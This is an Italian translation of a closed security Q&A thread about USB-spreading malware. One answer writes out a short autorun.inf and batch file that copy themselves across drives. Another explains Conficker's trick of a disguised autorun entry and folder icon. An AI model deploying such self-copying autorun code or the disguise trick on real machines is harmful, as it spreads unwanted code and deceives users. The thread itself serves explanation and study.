Esempio di malware che si diffonde via USB? [chiuso]

Question

Esempio di malware che si diffonde via USB? [chiuso]

#1 da (6 voti)
#2 da (2 voti)

3

Sto scherzando con Mandiant Redline su Windows Server 2012 in una VM e volevo scaricare un virus campione che si diffondesse via USB e modificarlo per attaccare Mandiant Redline - Non ho mai scritto malware prima, quindi se qualcuno ha un guida o un collegamento a un download in cui posso ottenere un esempio come questo lo apprezzerei.

Dove posso trovare malware di esempio con l'origine che si diffonde tramite USB? Dove posso trovare un tutorial sulla scrittura di malware in modo da poter capire di più su come funziona?

malware ids

posta gal 02.05.2013 - 19:31

fonte

2 risposte

Leggi altre domande sui tag malware ids

Che tipo di iniezione di sicurezza sono queste tracce di, SQL, javascript o altro? Perché TLS non è appena chiamato SSL v 4.0?

score 6 · Answer 1

autorun.inf

[autorun]
open=file.bat
shell\option1=Open
shell\option1\command=file.bat

file.bat

@echo off
copy autorun.inf C:\ > NUL
copy file.bat C:\ > NUL
copy autorun.inf D:\ > NUL
copy file.bat D:\ > NUL
explorer .

Riuniscili e ottieni qualcosa che si diffonderà tramite USB.

Su una nota più seria, non aspettarti che qualcuno ti dia semplicemente un pezzo di malware qui.

score 2 · Answer 2

Volevo solo toccare il post di Adnan. Poiché in materia di autorun USB, ecco un esempio del mondo reale che utilizza lo stesso schema.

Il recente virus di conficker usato Autorun per infettare i sistemi. Anche se non completamente automatico, si presenta come una legittima opzione autorun che la maggior parte delle persone è abituata a scegliere senza riflettere troppo. Conficker ha usato un autorun.inf simile come sopra, con le linee aggiunte:

Action=Open folder to view files
Icon=%systemroot%\system32\shell32.dll,4

Come puoi vedere, quando viene inserito il dispositivo USB, Windows Autorun presenta all'utente l'opzione "Apri cartella per visualizzare i file" con la stessa icona dell'opzione legit. Questo è un modo semplice per indurre l'utente a eseguire inconsapevolmente il codice.